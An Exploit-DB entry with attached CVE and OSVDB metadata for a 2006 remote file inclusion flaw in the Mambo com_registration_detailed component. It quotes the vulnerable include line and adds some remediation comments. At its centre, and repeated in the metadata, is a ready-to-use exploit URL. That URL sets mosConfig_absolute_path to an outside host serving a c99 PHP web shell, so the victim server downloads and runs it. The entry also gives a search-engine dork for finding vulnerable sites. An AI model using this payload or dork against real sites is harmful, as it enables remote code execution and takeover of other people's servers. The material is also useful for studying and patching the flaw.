ID EDB-ID:2379
Type exploitdb
Reporter k1tk4t
Modified 2006-09-16T00:00:00
Description
Mambo com_registration_detailed <= 4.1 Remote File Inclusion (CVE-2006-5254). Web application exploit for the PHP platform.
########################################################################
# Mambo com_registration_detailed <= 4.1 Remote File Inclusion
#
# Download Source : http://mamboxchange.com/projects/regdetailed/
# Dork = allinur:com_extended_registration
#
# Found By: k1tk4t - k1tk4t[d0t]h4ck[4t]gmail[d0t]com
# Location: Indonesia
########################################################################
Affected file:
registration_detailed.inc.php
########################################################################
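Vulnerable code (line 25):
# Root cause: $mosConfig_absolute_path is interpolated into the include path, and it
# evidently reaches this line without being set or validated by the file itself. When the
# script is requested directly on a server with register_globals enabled, the variable is
# populated from the request; if URL includes are permitted (allow_url_fopen, plus
# allow_url_include on PHP 5.2+), include_once() then fetches and runs remote PHP.
# Remediation: refuse direct access to the file (Mambo's `defined('_VALID_MOS') or die(...)`
# guard) and build the path from a trusted, server-side value only.
# Hardening: register_globals=Off, allow_url_include=Off.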
include_once("$mosConfig_absolute_path/components/com_extended_registration/language/$_REGISTER_DETAILS_LANGUAGE.inc.php");
#########################################################################
example exploit ;
http://victim.xxx/ components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://phpshell/c99.txt?
########################################################################
Thanks;
str0ke
milw0rm
google
#e-c-h-o (all member echo community)
#nyubi (all member solpotcrew community)
--> ghoz, home_edition2001, iFX, and for all (friend's&enemy)
# milw0rm.com [2006-09-16]
{"id": "EDB-ID:2379", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Mambo com_registration_detailed <= 4.1 - Remote File Include", "description": "Mambo com_registration_detailed <= 4.1 Remote File Include. CVE-2006-5254. Webapps exploit for php platform", "published": "2006-09-16T00:00:00", "modified": "2006-09-16T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/2379/", "reporter": "k1tk4t", "references": [], "cvelist": ["CVE-2006-5254"], "lastseen": "2016-01-31T16:07:49", "viewCount": 17, "enchantments": {"score": {"value": 7.2, "vector": "NONE", "modified": "2016-01-31T16:07:49", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-5254"]}, {"type": "osvdb", "idList": ["OSVDB:36055"]}], "modified": "2016-01-31T16:07:49", "rev": 2}, "vulnersScore": 7.2}, "sourceHref": "https://www.exploit-db.com/download/2379/", "sourceData": " ########################################################################\n # Mambo com_registration_detailed <= 4.1 Remote File Inclusion\n # \n # Download Source : http://mamboxchange.com/projects/regdetailed/\n # Dork = allinur:com_extended_registration\n #\n # Found By: k1tk4t - k1tk4t[d0t]h4ck[4t]gmail[d0t]com\n # Location: Indonesia\n\n ########################################################################\n file ;\n registration_detailed.inc.php\n ########################################################################\n bugs ;\n [at]line 25\n\n include_once(\"$mosConfig_absolute_path/components/com_extended_registration/language/$_REGISTER_DETAILS_LANGUAGE.inc.php\");\n #########################################################################\n example exploit ;\n http://victim.xxx/ components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://phpshell/c99.txt?\n ########################################################################\n Thanks;\n str0ke\n 
milw0rm\n google\n #e-c-h-o (all member echo community)\n\n #nyubi (all member solpotcrew community)\n --> ghoz, home_edition2001, iFX, and for all (friend's&enemy) \n\n# milw0rm.com [2006-09-16]\n", "osvdbidlist": ["36055"]}
{"cve": [{"lastseen": "2020-12-09T19:23:49", "description": "PHP remote file inclusion vulnerability in registration_detailed.inc.php in Mark Van Bellen Detailed User Registration (com_registration_detailed), aka regdetailed, 4.1 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.", "edition": 5, "cvss3": {}, "published": "2006-10-12T22:07:00", "title": "CVE-2006-5254", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-5254"], "modified": "2017-10-19T01:29:00", "cpe": ["cpe:/a:mamboxchange:extended_registration:4.1"], "id": "CVE-2006-5254", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-5254", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:mamboxchange:extended_registration:4.1:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:32", "bulletinFamily": "software", "cvelist": ["CVE-2006-5254"], "description": "## Manual Testing Notes\nhttp://[victim]/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://phpshell/c99.txt?\n## References:\nISS X-Force ID: 28982\nGeneric Exploit URL: http://milw0rm.com/exploits/2379\n[CVE-2006-5254](https://vulners.com/cve/CVE-2006-5254)\nBugtraq ID: 20072\n", "edition": 1, "modified": "2006-09-16T00:00:00", "published": "2006-09-16T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:36055", "id": "OSVDB:36055", "title": "regdetailed 
registration_detailed.inc.php mosConfig_absolute_path", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}